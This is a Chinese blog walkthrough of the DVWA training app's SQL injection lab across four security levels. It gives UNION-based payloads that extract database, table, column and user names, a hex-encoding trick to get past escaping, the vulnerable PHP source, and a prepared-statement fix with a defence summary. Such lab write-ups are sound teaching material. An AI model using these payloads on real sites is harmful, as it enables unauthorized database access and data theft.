DVWA-SQL Injection

最新推荐文章于 2024-04-08 14:44:20 发布
最新推荐文章于 2024-04-08 14:44:20 发布
阅读量173 收藏 1
点赞数
分类专栏: DVWA 文章标签: web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/124377603
版权

目录

简介

sql注入漏洞原理

将恶意的SQL语句拼接到合法的语句中,从而达到执行SQL语句的目的;

SQL注入漏洞类型

字符型;

数字型;

搜索型;

危害

  • 攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
  • 可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。
  • 如果网站目录存在写入权限,可以写入网页木马。攻击者进而可以对网页进行篡改,发布一些违法信息等。
  • 经过提权等步骤,服务器最高权限被攻击者获取。攻击者可以远程控制服务器,安装后门,得以修改或控制操作系统。

安全级别:Low

查看源码

在这里插入图片描述

源码分析

1.对用户的传参没有进行过滤,可以直接拼接sql语句

​ 2. 采用单引号闭合

数据库名

-1' union select 1,database() #

在这里插入图片描述

表名

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

在这里插入图片描述

列名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述

字段值

-1' union select 1,group_concat(first_name) from users #

在这里插入图片描述

安全级别:Medium

查看源码

在这里插入图片描述

源码分析

mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符
只是由GET类型传参改为POST类型传参
数字型sql注入

数据库名

1 union select 1,database() #

在这里插入图片描述

表名

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

不可以用table_schema=‘dvwa’,因为table_schema='dvwa’中带有单引号,会进行转义,所以我们需要将dvwa进行编码

在这里插入图片描述

列名

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

由于单引号被转义,用16进制转换

0x7573657273

字段值

1 union select 1,group_concat(first_name) from users #

在这里插入图片描述

安全级别:High

查看源码

 <?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}

?>

源码分析

  • mysqli_fetch_assoc() 函数从结果集中取得一行作为关联数组。
    mysqli_fetch_assoc(result);
    result 必需。规定由 mysqli_query()、mysqli_store_result() 或 mysqli_use_result() 返回的结果集标识符。
  • mysqli_query() 函数执行某个针对数据库的查询。
  • High级别在SQL查询语句中添加了LIMIT 1,以此控制只输入一个结果;
    虽然添加了LIMIT 1,但是我们可以通过#将其注释掉;
  • 从SESSION中获取id的值,使用单引号闭合。因为SESSION获取值的特点,不能直接在当前页面注入

闭合符号为

判断列数

1' order by 3 #出错,1' order by 2 #正常输出

1' order by 3 #

在这里插入图片描述

在这里插入图片描述
1’ order by 2 #

在这里插入图片描述
在这里插入图片描述

数据库名

-1' union select 1,database() #

在这里插入图片描述

表名

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

在这里插入图片描述

列名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述

数据

-1' union select 1,group_concat(first_name) from users #

在这里插入图片描述

安全级别:Impossible

查看源码

// Anti-CSRF token 防御 CSRF 攻击
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
 
 
$id = $_GET[ 'id' ];
// 检测是否是数字类型
if(is_numeric( $id )) {
  // 预编译
  $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
  $data->bindParam( ':id', $id, PDO::PARAM_INT );
  $data->execute();
  $row = $data->fetch();

源码分析

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入;
同时只有返回的查询结果数量为1时,才会输出;

防护总结

对参数进行预编译
使用正则表达式过滤传入的参数
字符串过滤,转义

空白行
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-----SQL Injection(SQL手工注入)
m0_65712192的博客
11-21 5931
DVWA-----SQL Injection(SQL手工注入)
SQL注入攻击的原理、分类和防御方法
热门推荐
Andrew的博客
02-27 2万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类型的注入 字符串类型的注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
【DVWA】20. SQL Injection (Blind)SQL注入盲注(全等级Sqlmap版)
最新发布
Zichel77的博客
04-08 1569
盲注,有两种主要类型,包括布尔盲注和时间盲注。
DVWA------SQL Injection (Blind)(SQL盲注)
m0_65712192的博客
12-09 2716
DVWA------SQL Injection (Blind)(SQL盲注)
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)
weixin_45116657的博客
08-25 4484
目录: 一、SQL盲注 SQL盲注与SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注: 盲注:SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
DVWA-master.zip
03-13
1. SQL注入(SQL Injection):这是Web应用中最常见的一种安全漏洞,允许攻击者通过构造恶意的SQL语句来获取、修改或删除数据库中的数据。在DVWA中,你可以学习如何识别SQL注入点,以及如何利用它们执行任意的SQL...
DVWA之SQL Injection
weixin_42075643的博客
02-19 322
SQL注入基础知识
DVWA通关--SQL注入(SQL Injection)
箭雨镜屋
01-26 1万+
LOW 通关步骤 1、找闭合 输入1' 报错 输入1'',不报错,说明闭合是单引号 2、确定列数 输入1' order by 2#,返回正确结果 输入1' order by 3#,报错,说明只有两列 3、 sql注入时union出错(Illegal mix of collations for operation UNION) 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析 总结 ...
DVWA使用教程(SQL injection)(七)
ai_64的博客
06-23 8434
DVWA使用教程(SQL injection)(七) DVWA是一个用来练习Web渗透的PHP应用。共有十个模块,分别是 1.Brute Force(爆破) 2.Command Injection(命令注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.File Uplod(文件上传) 6.Insecure CAPTCHA(不安全的验证码) 7.SQL Inj...
DVWA下的SQL Injection(Blind)
07-25
盲注
DVWA下的SQL注入
07-25
SQL
DVWA之SQL Injection(含SQLMAP使用)
一期一会的博客
03-21 376
DVWA之SQL Injection 判断是否存在注入的方法:在输入框输入 1’ Select * from xxxx where id =1’ Select * from xxxx where id =’1’’ 无论是整型还是字符型此时都会报错,说明存在注入点 一.等级:LOW (一)分类 1.整型 测试如下: 此时界面结果显示一致,说明并非整型 select * from xxx where id=1 and 1=2 若为整型,说明sql语句不成立,会报错 2.字符型 在输入框输入“1’ an
DVWA-SQL Injection(sql注入)
MzHeader的博客
03-22 1559
DWVA-SQL Injection(sql注入) 介绍 SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入思路 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面...
DVWA练习之SQL Injection
dz919908651的博客
08-27 1488
DVWA练习之SQL Injection 本博客将记录在web安全问题中一种常见的漏洞——“SQL注入”漏洞的实践演练。首先阐述SQL注入漏洞的概念,原理,最后展示基于DVWA的各种等级的SQL注入漏洞。 SQL注入 概念:指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如...
DVWA学习之SQL Injection(SQL 注入)
weixin_40950781的博客
08-20 1753
DVWA学习之SQL Injection(SQL 注入)SQL Injection(SQL 注入)0x01 何为SQL Injection(SQL 注入)0x02 万能密码0x03 SQL注入的分类1.数字型2.字符型3.搜索型3.1 搜索型简介3.2 搜索型原理3.3 搜索性注入判断方法0x04 SQL注入常规利用思路0x05 SQL注入步骤(非盲注)0x06 low级别1.判断是否存在注入,...
DVWA 之 SQL Injection
baynk的博客
10-29 1680
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值